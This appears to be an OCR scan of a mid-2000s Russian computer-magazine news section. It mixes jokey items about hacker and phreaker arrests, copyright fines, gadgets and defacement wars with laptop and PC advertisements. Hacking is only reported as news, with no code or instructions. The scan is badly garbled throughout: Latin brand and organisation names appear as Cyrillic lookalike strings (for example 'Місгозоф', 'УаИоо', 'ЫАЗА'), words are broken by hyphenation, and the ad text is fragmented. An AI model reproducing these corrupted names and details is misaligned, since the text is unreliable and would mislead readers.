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НЕБО В КЛЕТОЧКУ 
ДЛЯ ПАКИСТАНСКОГО 
ФРИКЕРА 



■ ? 



На Украине в городе Перво- 

Ш майск Николаевской области 

органам удалось задержать 
фрикера, уже долгое время 
звонившего по межгороду с по- 
мощью поддельных таксофон- 
ных карт. Работают такие кар- 
ты по принципу эмуляторов: 
сначала генерируют номер те- 
лефонной карточки, затем бло- 
кируют в таксофоне тарифика- 
цию звонка. Злосчастным фри- 
кером оказался выходец из Па- 
кистана, не имеющий к тому же 
гражданства. Задержали его 
прямо в будке, откуда он пы- 
тался на халяву позвонить сво- 
им пакистанским родственни- 
кам. Милиция в этом деле, ко- 
нечно, оторвалось на все сто. Мало того, что ее высмеивают за беспо- 
мощность в раскрытии компьютерных дел, так еще и какой-то изувер 
решил облапошить украинское правительство. Вердикт на суде был 
суров: подсудимый нанес непоправимый ущерб оператору связи, ви- 
новен и отправляется за бетонные стены сроком на 3 года. 



* 



ВЗБЕШЕННАЯ СЕСИ- 
ЛИЯ ПРОТИВ УАНОО 

Жила-была Сесилия Бэйрнс. Не 
сама жила, а с бой-френдом Рэн- 
дольфом. Как часто бывает, со 
временем парочка приелась друг 
другу, начались ссоры, скандалы. 
И в один прекрасный день Сесилия 
заявила: «Импотент! Мне нужен 
настоящий мужчина, жеребец. 
Убирайся вон, ни на что не годный 
засранец!». Рэндольф ушел, но ис- 
тория на этом не закончилась. 
«Импотент» оказался мститель- 
ным, и, чтобы насолить бывшей 
подружке, зашел на сервис зна- 
комств компании УаИоо, зарегил 
там анкету и разместил в ней обна- 
женные фотки Сесилии. А в контактах указал ее рабочий телефон, мо- 
бильник и емейл. Так как формами Сесилию природа не обделила, пред- 
ложения «по-дружески чпокнуться» посыпались уже на следующий день, 
и с каждым днем их становилось все больше. Женщина попыталась уб- 
рать анкету, связавшись с администрацией сервиса, но там ее жалобы 
проигнорировали. Тогда она подала на ѴаІіоо в суд. «Три миллиона бак- 
сов, и моя психологическая травма сможет зарасти», — воскликнула ма- 
дам. Пока неизвестно, сколько денег достанется Сесилии. Но я буду сле- 
дить за продолжением этой истории и расскажу, чем она закончилась. 




ЛАБОРАТОРИЯ, ОБЪЕ- 
ДИНИВШАЯ СООСІ.Е 
И МІСЯ080РТ 

После многочисленных перебранок 
и судебных разбирательств между 
Ооодіе и Місгозоф кто бы мог поду- 
мать, что две эти компании вскоре 
начнут сотрудничать. К ним присое- 
динилась Зип Місгозузіетз, которая 
тоже воюет с Місгозоф но имеет 
теплые отношения с Ооодіе. Проек- 
том, который объединил враждую- 
щие стороны, стала исследовательс- 
кая лаборатория ВАО (Безотказные 
Адаптивные Распределенные Систе- 
мы), основанная при Калифорнийс- 
ком университете Беркли. Три ІТ-гиганта на равных паях вложили 
в нее 7,5 миллионов и установили ежегодный бюджет в размере 1 ,5 
миллиона долларов, поступающие от каждой из этих компаний. Цель 
лаборатории — разработка сетевого ПО, которое поможет запускать 
крупные интернет-порталы типа еВау.сот и Атагоп.сот. Пока в лабо- 
ратории работает 16 человек, среди которых профессора и одаренные 
выпускники университета Беркли, а руководителем назначили про- 
фессора Дэвида Паттерсона. Конечно, после новости о сотрудничест- 
ве, поползли слухи, что войне между монстрами ІТ-индустрии пришел 
конец. Но ведущий исследователь МісгозоК Джеймс Парус опроверг 
их своим заявлением, что соглашение было заключено не ради пере- 
мирия, а только потому, что принесет выгоду всем трем сторонам. 



СКАЧАЛ МРЗ? 

ПЛАТИ ШТРАФ 

В Чикаго закончился суд над 
Цецлией Г онзалес, которую об- 
винили в незаконном скачива- 
нии музыки из Интернета. 
На компьютере дамочки храни- 
лось около тысячи композиций 
в формате трЗ. «И че?» — 
спросишь ты. «А вот плати 22,5 
тысячи долларов!» — вынес 
приговор суд. Дамочке еще по- 
везло, что обвинения звукоза- 
писывающей компании ВІАА, 
подавшей на нее иск, касались 
только 30 песен. И сумма штрафа получилась из расчета 750 долларов 
за каждую. Вообще, ВІАА уже долго присматривалась к мадам Г онзалес 
и до этого предлагала «злостной нарушительнице» выплатить 3,5 коса- 
рей, чтобы замять инцидент. Мадам Гонзалес отказалась, и дело дошло 
до суда. Эксперты считают, что этот процесс станет поворотным в борь- 
бе с нарушителями авторских прав, так как такого наказания за простое 
скачивание песенок не получал еще никто. Рядовые интернетчики же 
считают, что у ВІАА крыша едет. Пользуясь случаем, хочу признаться, 
что у меня на компе больше 40 тысяч трЗ'шек, а у моего соседа Бори — 
более 50 тысяч. И ВІАА может поцеловать нас в зад :). 
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ЗМЗ-КАМИКАДЗЕ 

Интересную услугу предло- 
жила британским жителям 
компания ЗіаеІІіит ІІК. На- 
зывается она ЗІеаІШТехІ и 
представляет собой ЗМЗ- 
ки, которые уничтожаются 
сразу после прочтения. Те- 
перь тебе не придется бо- 
яться, что сообщение «сол- 
нышко, у нас сегодня роман- 
тический ужин на двоих, ку- 
пи по дороге презервати- 
вов», отправленное на мо- 
бильник жены босса, слу- 
чайно попадет на глаза Сер- 
гею Петровичу. Правда, ни- 
каких нейронно-атомных ре- 
волюционных открытий в 
этой технологии нет. Просто 
адресату приходит имя отп- 
равителя и ссылка на текст, 
которая перестанет работать через 40 секунд после прочтения. Новин- 
кой уже успели заинтересоваться финансовые компании и Министер- 
ство обороны Великобритании, в 2006 году ЗіаеІІіит планирует продви- 
гать ее в остальные страны Европы, США и Азию. Причем на одних 
ЗМЗ компания зацикливаться не собирается. По словам президента 
ЗіаеІІіит Кэрола Барнума, они уже приступили к подготовке новых сер- 
висов: самоуничтожающихся емейлов, саморазрушающихся голосо- 
вых сообщений и самоаннигилирующихся картинок. Не знаю, как вы, 
а я бы заодно предпочел самоиспаряющуюся жену, хотя бы на год. 



ГЕРОИ 

И ВРАГИ ИНТЕРНЕТА 

Кто, по-твоему, глав- 
ный враг Интернета? 
Твой провайдер? Билл 
Гейтс? Мысли масш- 
табнее, чувак! Чтобы 
определить настоящих 
врагов и героев инета, 
коалиция британских 
провайдеров ІЗРА про- 
анализировала тысячи 
компаний и организа- 
ций. И недавно объяви- 
ла список номинантов, 
из которых в начале 
2006 года отберут побе- 
дителей. В тройку са- 
мых злостных врагов 
вошли: Еврокомиссия 
(за попытки регулиро- 
вать содержимое ин- 
тернет-ресурсов), кон- 
церн Золу ВМС (за защиту музыкальных дисков, сравнимую по вре- 
доносности с компьютерными вирусами) и... Российское правитель- 
ство (за свою несостоятельность противостоять компьютерным прес- 
туплениям). Героем года станет один из трех претендентов: Британс- 
кое Парламентское Объединение АРІО (за улучшение законов Вели- 
кобритании в отношении Сети), организация ОТА (за контроль над 
ценами и тарифами провайдеров) и регулирующий орган ОІсот (за 
поддержание стабильности рынка платных телефонных услуг). Хоть 
убейте, не понимаю, по каким критериям отбирали номинантов и по- 
чему в список врагов не вошла ВІАА, которая уже какой год воюет 
против всего Интернета. Коалиции, наверное, виднее. Как по мне, 
так главный враг мировых средств связи — моя соседка тетя Варя. 
Дура, оборвала кабель, совсем под ноги не смотрит. 



ДОБРОВОЛЬНАЯ 
ПЫТКА ХОСТИНГ- 
СЕРВИС 

Есть такой замечательный метод 
«кнута и пряника». Действует бе- 
зотказно! В принципе, даже на- 
личие пряника совершенно не 
обязательно, достаточно и од- 
ного кнута. А если ты думаешь, 
что этот метод давно устарел, и 
в цивилизованном мире ему нет 
места, то ты глубоко заблужда- 
ешься. Могу даже предложить 
тебе испробовать его на себе. 
Само собой, не стоит восприни- 
мать «кнут» дословно, его с лег- 
костью может заменить новый 
уникальный девайс от японской 
компании Таіуо Іпс под названием Виг^Тгаіпег. Работает эта штука так: 
на руку надевается небольшой напульсник, от которого тянется провод 
к ІІЗВ-разъему, в комплекте также идет специальный софт, необходи- 
мый для работы устройства. Если при работе за компом ты сделаешь 
что-то не так, например, опечатку при наборе текста в ѴѴогсГе, то полу- 
чишь слабый, но заметный электрический разряд. В следующий раз (ес- 
ли ты, конечно, не фанат мазохизма) скорее всего данную ошибку уже 
не повторишь. Проведя небольшое исследование, разработчики убеди- 
лись, что количество опечаток при использовании Ви 22 Тгаіпег заметно 
уменьшается. Кстати, помимо слежения за опечатками, девайс может 
наказывать и за занятия всякими неподобающими вещами, к примеру, 
при заходе на порносайт или в чат, при чрезмерном увлечении игрой 
или скачивании нелегальной музыки... Поэтому разработчики рекомен- 
дуют свой товар и заботливым мамашам, которые по-прежнему увере- 
ны, что компьютер их чадам нужен только для учебы. Кстати, оказыва- 
ется, что ВиггТгаіпег не такой уж и безобидный, так что не рекоменду- 
ется беременным и детям до 12 лет. 



СПИДОМЕТР ПО ѴѴІ-ГІ 




Давно известно, что подавляющее большинство автокатастроф происхо- 
дит по причине нарушения правил дорожного движения, а преимущест- 
венно — из-за превышения скорости (около 25% от всех аварий). Вот 
только как убедить в этом самих водителей? Всякие профилактическо- 
разъяснительные мероприятия, естественно, ни к чему не приводят, а 
штрафы оседают исключительно в карманах гаишников. Однако власти 
Канады подобрали подходящий рецепт. Отныне с данными нарушителя- 
ми будут бороться самым радикальным способом. Нет, любителей быст- 
рой езды, конечно, не будут сажать на электрический стул, просто-нап- 
росто планируется оборудовать все (по возможности) машины специаль- 
ными ограничителями скорости. Теперь все попытки выйти на первую 
космическую скорость будет пресекать сам автомобиль: при приближе- 
нии к скоростному ограничению педаль газа будет все сильнее сопротив- 
ляться нажатию. Информация о том, где и какая скорость разрешена, бу- 
дет определяться при помощи встроенного модуля ОРЗ, который сможет 
сверять местоположения болида с картой разрешенных скоростей. Дан- 
ная система уже протестирована в Северной Америке, Швеции, Нидер- 
ландах и Британии, где показала отличные результаты. Впрочем, данный 
девайс большинство водителей явно встретят с откровенным негодовани- 
ем, и пока еще непонятно, как заставить всех поголовно им обзавестись. 
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Лучше меньше, да лучше 




Мобильные компьютеры бизнес-класса ТгаѵеІМа1:е 
серии 8100 ориентированы на пользователей, которым 
необходим компактный ноутбук, сравнимый с настольным 
ПК по функциональности и производительности. 



Ноутбук Асег ТгаѵеІМаІе серии 8100 



• Новое поколение технологии Іпіеі® Сепітіпо™ 

• Процессор Іпіеі Репііит М 

• Чипсет ІпіеІ® 915РМ Ехргезз с частотой 
системной шины 533 МГц 

• Г рафический адаптер для мобильных систем 
АТІ® МОВІЫТѴ™ КАйЕОІЧ™ Х700, 128 Мб 

• Дисплей 15.4" ѴѴ5ХСА+ (1680x1050) ТЕТ 

• Память до 2048 Мб ООР-ІІ 533 

• Оптический привод 0Ѵ0-В\/Ѵ-5ирегМиІ1:і 

• Жесткий диск от 60 Гб АТА 100 

• Адаптер беспроводной связи 802.11 а /Ь/д ѴѴЕАІЧ 

• Устройство чтения карт флэш-памяти 5-в-1 

• Встроенный ВІиеТооТИ® 

• Сетевой адаптер 10/100/1000 ЕАЫ 

• Поддержка интерфейса 5-ѵісІео ТВ-выхода (І\ІТ5С/РАО 

• МісгобоіТ® ѴѴіпсіоѵѵб® ХР РгоТезБІопаІ 



Ультрапортативный мобильный компьютер 

Ноутбук Асег ТгаѵеІМаіе серии 3000 

Ноутбуки Асег ТгаѵеІМаІе серии 3000 - 
отличный выбор мобильного пользователя 
и профессионала. Вес ноутбука - всего 1.45 кг, 
а габариты - не больше листа бумаги формата 
А4. Отличительные потребительские характе- 
ристики ТгаѵеІМаІе 3000: высокая мобильность, 
компактность, долгое время работы 
в автономном режиме, а также 
уникальный дизайн нового 
направления Роііо, благодаря 
которому ноутбук выглядит солидно 
и удобен в использовании. 




Мультимедийный центр нового поколения 

Ноутбук Асег Азріге серии 1690 

Ноутбуки Асег Азріге 1690 обеспечат своему 
владельцу высокие скорости работы с 
мультимедийными приложениями. В основе 
мультимедиа-возможностей Асег Азріге 1690 
лежат новые процессоры Іпіеі® Репйшп® М 
с частотой до 2 ГГ ц, платформа ІпіеІ® Сепітіпо™ 
и мощная графическая подсистема на базе 
АТІ МоЬіІіТу™ Васіеоп® хбОО или х700 
Широкоформатный дисплей 15.4" 

(1280x800) с повышенной четкостью 
и яркостью картинки идеально 
подходит для просмотра видео 
и компьютерных игр. 






ДИЛАЙН 

дистрибьюторская компания 



тел.: (095) 969-2222 
факс: (095)969-2299 



ВАН 

Элиот [Резерв] 

Юником 

Компания КОНТУР 
Техно 



(34949) 52058 Технополис-21 (8332) 480888 

(0932) 293639 Салон нотебук (341 2) 658262 

(3532) 763900 Техно-ОПТ (8172) 540792 

(4212) 701 745 Эльдорадо (861 7) 631 1 55 



(3472) 505550 АВАЛОН СИСТЕМС (3952) 258208 



ѵѵѵѵѵѵ.сіеаііпе.ги г. Москва, Митино, ул. Зенитчиков, д. 1 



НІТЕСНЫЕѴѴ5 



НАВРЫЕМЗ ▼ 



НОВЫЙ ГУМАНОИД 

Компания Нопсіа продемонстрировала новую версию своего знамени- 
того робота АЗІМО, который в последнее время стал одной из основ- 
ных визитных карточек фирмы. Принципиальных нововведений в но- 
винке появилось не так много. Отныне АЗІМО способен ходить прак- 
тически со скоростью обычной походки человека (примерно 6 км/ч), и 
во время движения может держать человека за руку. А также робота 
обучили выполнять различную несложную работу по офису: может 
разносить некоторые предметы (например, горячий кофе), плюс пере- 
давать заданную информацию. Новый АЗІМО уже поступил в продажу, 
и разработчики надеются, что найдется немало покупателей, которые 
вместо секретарш предпочтут настоящего робота. Точная цена на ро- 
бота пока не разглашается, однако что-то мне подсказывает, что за те 
же самые деньги можно будет нанять целый взвод длинноногих секре- 
тарш, и далеко не факт, что они будут менее эффективны. 




ГУБОШЛЕП 

На прилавках японских мага- 
зинов недавно появилась весь- 
ма оригинальная гарнитура, 
сделанная в форме мультяш- 
ных губ, закрепленных на ок- 
ругленной подставке. Весь 
кайф устройства сотоит в том, 
что когда во время разговора 
ты будешь слышать собесед- 
ника, девайс будет двигать гу- 
бами, стараясь точно попадать 
в такт его речи. На выбор пред- 
лагаются устройства трех цве- 
тов: красные с белой помадой, 
черные — с красной и сереб- 
ристые — с голубой. Гарниту- 
ру можно подключить к компь- 
ютеру или компьютер — через 
ІІЗВ, а если мобильник не оборудован данным разъемом, то можно 
обойтись и стандартным )аск. Конечно, не совсем понятно, зачем подк- 
лючать это устройство к мобильнику, а вот на рабочем столе оно будет 
смотреться более чем стильно. Также девайс может работать и в каче- 
стве акустики, однако не самого лучшего качества. 



ДЛЯ ЛЮБИМЫХ УШЕЙ 



Если путь к сердцу мужчины, как гласит народная мудрость, лежит че- 
рез его желудок, то, соответственно, женщина любит ушами. Но знать 
это мало, нужно уметь воспользоваться знанием. Сделать это можно 
так: поставить у себя в комнате качественные и стильные колонки АѴЕ 
090 и тогда успех у красавиц тебе гарантирован. Динамики в них распо- 
ложены по технологии О’АроІІіІо: средние частоты в них воспроизводят 
два драйвера с 2,5-дюймовым бумажным диффузором-чашкой, а также 
дюймовый твитер с купольным излучателем (вероятно, он будет выпол- 
нен из ткани). Воспроизведение же баса возложено на внушительный 
динамик с 6-дюймовым диффузором, который расположен на боковой 
стенке (в обеих колонках басовики ориентированы внутрь стереобазы). 
Мощность встроенного усилителя составляет 40 Вт на канал (ВМЗ), 
а органы управления расположены в специальном углублении на внеш- 
ней боковой. Тут находится темброблок (НЧ и ВЧ), а также регуляторы 
громкости и эхо сигнала с обоих микрофонных входов, которые также 
реализованы в 090. Внешняя отделка состоит из черных лакированных 
передних панелей, корпус выполнен в стиле «под темное дерево», 
дополняют картинку лакированный подиум и стильные опоры. 



ПОДАРИ СЕБЕ РНІІ.ІР8 




Праздники кончились, ты подарил всем подарки? Если да, то очень хо- 
рошо. Ну а если кого-то забыл, кто-то был в отъезде? Кстати, а себя- 
то ты не забыл? Если вдруг произошел такой казус, то ты можешь на- 
верстать упущенное: компания РГііІірз выпустила новый 0\Ю-рекордер 
ОѴБВ 3330 Н, который станет отличным подарком для всех. Достаточ- 
но подключить его к телевизору, и ты забудешь о многих проблемах: 
теперь неважно дома ты или нет, но любимый фильм или передачу 
пропустить будет затруднительно благодаря планировки записи. С за- 
писью связаны и другие возможности: просмотр начала передачи (по- 
ка конец еще пишется), автоматическое включение записи по распи- 
санию, воспроизведение понравившихся сцен во время записи и так 
далее. Благодаря интерфейсу і.Ыпк можно делать записи с цифровой 
видеокамеры. Кстати, а на что записываем? Ответ прост и приятен - 
на встроенный 160 Гб жесткий диск! Так что места всем хватит. Но это 
не только рекордер, но и плеер, который работает с целой кучей фор- 
матов: ОУО, ОѴБ+В/ВѴѴ, ОѴБ-В/В ѴѴ, (З)ѴСО, ЗРЕО,СО,СО-В/ВѴѴ 
и МРЗ-СБ. Приятного просмотра! 
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НЕСРАВНИМО МОЩНЕЕ! 




Высокая мощность компьютера Эксимер™ Ноте Мазіег Рго на базе процессора Іпіеі® Репііит® 4 640 с технологией НТ - 

это залог Вашей уверенности в себе перед самыми сложными и нестандартными задачами, которые нам готовит будущее. 



Компания Эксимер рекомендует 
лицензионную ОС МісгозоГС® ѴѴіпсІоѵѵз® ХР 



ехсітен 



\лі\л/\л/.ехсітег.сот 



ѴѴеЬ: ѵѵѵѵѵѵ.ехсітег.сот/ііотетазіегрго 

Спрашивайте в магазинах Техносила и М. Видео 



Обозначения Сеіегоп, Сеіегоп Іпзісіе, Сепігіпо, Сепігіпо Іодо, Іпіеі, , Іпіеі Соге, Іпіеі Іодо, Іпіеі Іпзісіе, Іпіеі Іпзісіе Іодо, Іпіеі ЗреесІЗіер, Іпіеі Ѵііѵ, Іпіеі Хеоп, Ііапіит, Ііапіит Іпзісіе, Соге Іпзісіе, Репііит и Репііит 
Іпзісіе являются товарными знаками, либо зарегистрированными товарными знаками, права на которые принадлежат корпорации Іпіеі или ее подразделениям на территории США и других стран. 







НІЧЕѴѴ8 ▼ 



][МЕѴѴ5 ▼ 



У ГАИШНИКОВ 
СПЕРЛИ ДОМЕН 

Забавный случай прои- 
зошел в городе Тольят- 
ти. Админ сайта 
ѵѵѵѵѵѵ.ааіМ.ги . принадле- 
жащего местному ГАИ, 
забыл проплатить до- 
мен, и этим тут же вос- 
пользовались доблест- 
ные киберсквоттеры. 
Адрес был зареган на 
нового владельца, и на 
индексной страничке по- 
явилась красочная надпись: «Продаеццо». Гаишники от такой наглости, 
конечно, офигели, но полосатой палочкой ведь сетевых акул не образу- 
мишь. Поэтому решили пойти по легкому пути. Они просто зарегапи но- 
вый сайт с похожим названием — ѵѵѵѵѵѵ.Мааі.ги — и восстановили там весь 
старый контент. Я пока писал новость, даже придумал новые названия 
для сайтов, на случай, если угонят и этот: ѵѵшѵ.ііі.ааі.ги . ѵѵѵѵѵѵ.ааі-іііги . 
ѵѵѵѵѵѵ.бопіПаскизрІеазе.Мааі.ги . Пользуйтесь, товарищи гаишники :). 



АНТИХАКЕРСКИЙ 

ЧИП 

На недавней встрече с 
представителями прессы и 
компьютерной молодежью 
корпорация Іпіеі подели- 
лась информацией о своих 
будущих проектах. Самым 
интересным и перспектив- 
ным, пожалуй, является но- 
вый чип, размещаемый на 
материнской плате и отсле- 
живающий изменения в ко- 
де запущенных программ. Многие современные черви воздействуют на 
программы в трее, нередко вставляя в них свои модули для последующе- 
го заражения. Секурный чип ІпіеІ быстро обнаружит такое вмешательство 
и подаст сигнал тревоги, а дальше админ уже может отключить комп от се- 
ти и искать лекарство. Можно настроить, чтобы при тревожных сигналах 
это делалось автоматически. Так как далеко не все юзеры устанавливают 
антивири и противошпионское ПО, включение чипа в стандартную сборку 
РС обещает повысить защищенность компьютеров в целом. Представите- 
ли Іпіеі сообщили, что не претендуют полностью заменить зесигііу-софт, но 
считают, что их чип будет отлично дополнять другие программы защиты. 



КОСВЕННЫЕ УЛИКИ 



■ 



Хакерские нападки на важные сетевые ресурсы американского прави- 
тельства продолжаются, и в последнее время только участились. Кто за 
ними стоит? Кевин Митник? Усама бен Ладен? «Нет!» — перечеркивает 
главных подозреваемых помощник директора ФБР Луис Рейгел. «Это 
правительства других стран!». Конечно, не только власти могут быть за- 
интересованы в передовых разработках американских ученых, но толь- 
ко у властей есть возможности инициировать качественные взломы за- 
щищенных систем. «Гораздо дешевле для страны организовать кражу 
информации через Интернет и использовать ее для развития техноло- 
гий, на создание которых у США ушли десятилетия», — объяснил Рей- 
гел. «У нас нет улик, но у нас есть подозрения, и это уже немало!» — ре- 
зюмировал он же. ФБР, судя по всему, не читает новостей, иначе бы 
знало, что в научных сетях ЫАЗА орудуют десятки несовершеннолетних 
скрипткидисов, которым не нужны средства правительства для подбора 
нужного эксплойта. В общем, тревожные сегодня времена. Вдруг завт- 
ра США решит, что это Российское правительство ковыряется в компь- 
ютерах Пентагона? Слово за слово, и может произойти Третья мировая. 



ЗДРАВСТВУЙ, СЫНОК. 
ВЫШЛИ ДЕНЕГ 




В наше время все зарабатывают, как могут. Мой попугайчик танцует лез- 
гинку за просо. Я вот, чтобы кушать, пишу всякую хрень. А молодой пар- 
нишка из Сочи, имя которого мне пригрозили не называть, создал мыль- 
ный бизнес. Нет, он не отлавливал бездомных собачек, из которых вари- 
ли мыло. Он просто взламывал электронные почтовые ящики и, представ- 
ляясь родственником владельца, просил денег. «Здравствуй сынок, как 
дела, родимый? Хорошо? А я вот в аварию попала, 1 5 переломов только 
на левой ноге. В общем, нужны деньги на лекарства. Поможешь? Ой, как 
славно. Вот тебе реквизиты. Жду в долларах, срочно. Целую, мама». Ну, 
или что-то в этом духе. Правда, дураков находилось немного, поэтому со- 
чинский Бэндер стал осваивать интернет-кафешки. Оставлял на компью- 
тере специальную программу, считывающую все введенные пароли, ло- 
гины и номера банковских счетов, и дальше уже думал, где полученное 
добро использовать. Правда, разбогатеть незадачливый бизнесмен не ус- 
пел. Парня вычислили сотрудники отдела «К» и передали дело в суд. Те- 
перь ему грозит до 5 лет тюрьмы. 



ЧИЛИЙСКИЕ 
ХАКЕРЫ ОБЪЯВИЛИ 
ПЕРУАНСКИМ ВОЙНУ 

Если ты регулярно смотришь СЫЫ, то должен знать, что между Чили и 
Перу сейчас назрел нешуточный конфликт. Чили владеет 38 тысячами 
квадратных километров чудесных рыбопромысловых вод, и соседству- 
ющая Перу намеревается присвоить их себе. Вообще, эти два государ- 
ства постоянно спорят по поводу своих территорий, но посягательство 
на рыбопромысловую воду — уже слишком. Последней каплей стали 
безуспешные попытки поделить авторство на популярный местный ал- 
когольный напиток «різсо» (не путать с писькой). Пока политики, предс- 
тавляющие обе страны, рвут до крови друг другу брови, перуанские ха- 
керы решили взять дело в свои руки. А именно: принялись ломать пра- 
вительственные сайты и оставлять на них лозунги в духе: «Отдайте на- 
шу рыбу! Руки прочь от «писки»!». Но ведь и в Чили не только ферме- 
ры живут. Не долго думая, чилийские хакеры хакнули сайты правитель- 
ства Перу, подписывая их: «Не отдадим нашу рыбу! И писку нашу не 
троньте!». Вот такие вот страсти кипят на чилийско-перуанских просто- 
рах. Вопрос, чем все закончится, остается открытым. 
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НАВ0ЫЕѴѴ5 ▼ 



НАВРЫЕѴѴЗ ▼ 



РВЕ8ТІСІО — 

ЭТО ПРЕСТИЖНО 



ПОЛНЫЙ Ц$В 
ОТ 8АМ8ІЛІС 




Семейство ноутбуков компании Ргезіідіо, рассчитанных на работу в доро- 



ге и имеющих для этого небольшие габариты и вес, пополнилось новой 
моделью. Это Ѵізсопіе 1450ѴѴ, тонкий и стильный мобильный ПК, имею- 
щий хорошие возможности, высокую производительность и массу инте- 
ресных функций. Стоит он чуть более тысячи долларов. Поставляется мо- 
бильный ПК в двух основных модификациях: на основе процессора Іпіеі 
Репйит М 7хх (1.60-2.0 ГГц, 533 МГц РЗВ, 2 Мб І_2) либо на основе Іпіеі 
Сеіегоп М Зхх (1 .30 ГГц и выше, 400 МГ ц РЗВ, 512 Кб/1 Мб, 90 нм) с рас- 
ширяемой поддержкой до 2 Гб памяти. Модели на Репііит М построены 
на платформе Сепігіпо второго поколения, что дает им адаптер ѴѴі-Рі и 8- 
канальный звуковой кодек. Помимо этого, все модели обладают широко- 
форматным 14-дюймовым экраном и встроенной веб-камерой. Но это 
больше для развлечений, а серьезные граждане оценят встроенный 
ВІиеІооШ-адаптер, кардридер, большой набор портов и 4,5 часа обещан- 
ной автономной работы. И не забудьте про стильный внешний вид! 



Сейчас на рынке находится столько флеш-плееров, что только очень- 
очень ленивый производитель не имеет в своем арсенале такого уст- 
ройства. Естественно, при таком изобилии обычным устройством ни- 
кого не удивишь, поэтому вендоры добавляют в свои изделия малень- 
кие, но очень интересные, полезные и удобные фишки. Таким устрой- 
ством является трЗ-флеш плеер Затзипд У Р-111 , который имеет пол- 
норазмерный встроенный ІІЗВ-порт, что позволяет ему обходиться 
без неудобных проводов-удлинителей. Просто подключаешь его 
к ІІЗВ-порту компьютера, и все - закачивай музыку. Вот такая вот 
фишка у этого плеера. В остальном он тоже неплох: поддерживает 
форматы МРЗ, 0(3(3, АЗР и ѴѴМА, систему звучания ЗВЗ ѴѴОѴѴ 30. 
В продаже есть модели с емкостью от 256 Мб до 1 Гб, которые, по за- 
верениям производителя, могут работать от аккумулятора 13 часов. 
Габариты устройства составляют 23,8x87,8x13,5 мм, а его вес - 30 г. 




Дистрибутив 

диске, влшмщоу 

СеЭчйЙ 



I Звони с компьютера на любые 
дане и мобильные телефонные 
камера по всему миру! 



с 1 ПО 31 
в будни 
скидца на 
доступ 






1Р0БНАЯ ИНФОРМАЦИЯ ПО ТЕЛЕ 



НІТЕСНЫЕѴѴ5 ▼ 



НІТЕСНЫЕѴѴЗ ▼ 



НАСТОЛЬНАЯ 

РАКЕТНИЦА 



МНОГОПОЛЬЗОВА- 
ТЕЛЬСКОЕ ПОРНО 



Известный онлайновый магазин 
Магкз & Зрепсег предложил сво- 
им покупателям весьма ориги- 
нальный ІІЗВ-гаджет, который 
может стать неплохим подар- 
ком. Игрушка представляет со- 
бой миниатюрную ракетную ус- 
тановку, роль снарядов в кото- 
рой выполняют стилизованные 
под ракеты дротики. Если на 
компьютер установить идущий в 
комплекте софт, то артиллерией 
можно будет полностью управ- 
лять прямо с экрана монитора. 
Для наведения на цель установка может поворачиваться вокруг сво- 
ей оси и изменять угол атаки. Конечно, точность попадания придет не 
сразу, но после должной тренировки дротики можно будет практичес- 
ки с любого расстояния отправлять точно в лоб зазевавшемуся боссу. 
Если подговорить коллег по работе купить себе такие же девайсы, то 
офис можно будет моментально превратить в настоящую зону воен- 
ных действий. К сожалению, вместе с установкой поставляется всего 
три дротика, которые наверняка быстро потеряются, однако взамен 
можно будет пустить в ход, к примеру, остро заточенные карандаши, 
если приделать к ним небольшое оперение. Если ты уже мечтаешь о 
подобном устройстве, то будь готов списать со своего счета $35. 




ѴІА БОРЕТСЯ 
ЗА ЛИДЕРСТВО 

Корпорация ѴІА активно возвращается на рынок чипсетов. Не- 
давно она начала отгружать вендорам НМС К8Т900, предназ- 
наченный для создания системных плат для процессоров 
АіНІоп 64 и поддержки графических решений, использующих 
несколько графических адаптеров. Кроме того, в ѴІА К8Т900 
будет существовать полная поддержка графических решений 
компании 33 ѲгарМісз - СНгопле 327 и технологии МиШСИгопле 
(аналог АТІ СгоззРіге и пѴісІіа ЗІ_І). Это чип 33, рассчитанный на 
платы среднего ценового сегмента. Если ты пока точно не ре- 
шил, что будешь использовать эти девайсы, то тебе понравит- 
ся поддержка в этом чипсете более общих вещей, таких как 
шесть портов РСІ Ехргезз хі, встроенная аудиоплата ѴІА 
ѴіпуІАисІіо (восемь каналов) и четыре разъема ЗАТА 3.0 Гб/с. К 
сожалению, если ты не владеешь заводом по производству 
системных плат, а пока эти чипсеты поставляются только туда, 
то ты сможешь насладиться его возможностями только в 1 
квартале этого года. Уже в виде полноценной платы. 



Пока неугомонные аме- 
риканские правозащит- 
ники и политики пыта- 
лись всеми силами бо- 
роться за ограждение 
несовершеннолетних 
от всяких безобидных 
игр типа ЭТА и Ооогп, 
вне их поля зрения ока- 
зался куда более серь- 
езный враг: первая в 
мире онлайновая мно- 
гопользовательская иг- 
ра с откровенным эротико-порнографическим уклоном ІМаидПІу 
Атегіса: ТПе Оате. Инициатором данного проекта выступил доволь- 
но известный (в узких кругах) порнопортал ЫаидИІуАтегіса.сот. 
Разработка уже приближается к завершающей стадии, и релиз на- 
мечен на весну этого года. По сути, игра представляет собой обык- 
новенный клон Зітз, только перенесенный в онлайн и переделан- 
ный под тематику ночной жизни. Вначале игроку предлагается соз- 
дать собственного персонажа (тело, лицо, цвет кожи, прическа и так 
далее). В дальнейшем в распоряжении игрока будут всевозможные 
ночные клубы, казино, бары, отели, секс-шопы и прочие злачные 
места, где можно знакомиться с другими игроками и участвовать в 
разных мини-играх (опять же эротического содержания). Хотя все 
это — лишь прелюдия к главному режиму игры. Ведь для полного 
погружения в процесс можно будет даже активировать режим веб- 
камеры. Как ни странно, даже самые ярые борцы за чистоту детских 
нравов пока никак не комментируют данную игру (скорее всего, у 
них от удивления произошло некое подобие переполнения буфера). 

ОДНА 

ТАРАКАНЬЯ СИЛА 

Фрайско Лопез, ученый из Университета Фити, совместно со своими 






студентами недавно продемонстрировал результаты своей многолет- 
ней научной работы. Им удалось отыскать механизм, с помощью кото- 
рого можно преобразовывать биохимическую энергию в электричест- 
во. По итогам многочисленных экспериментов было выявлено, что на- 
илучших результатов можно добиться, используя в качестве топлива, 
как ни удивительно, ферменты насекомых-вредителей (тараканы, мос- 
киты и прочие). В среднем из одного насекомого можно выжать напря- 
жение от 0,5 до 1 ,25 вольта, причем из всех видов именно тараканы 
демонстрируют оптимальные показатели. Помимо теоретического ис- 
следования, был разработан и прототип топливного элемента питания, 
который, по сравнению с промышленными аналогами, использует аб- 
солютно безопасное топливо и не вреден для окружающей среды. Во 
время эксперимента от данной батарейки удалось одновременно под- 
зарядить люминесцентную лампу (12 В) и небольшую микроволновку 
(24 В). Правда, возникает другой вопрос: где теперь взять столько вре- 
дителей? Возможно, недалек тот день, когда их будут продавать меш- 
ками, а присутствие тараканов дома будет считаться большой удачей. 
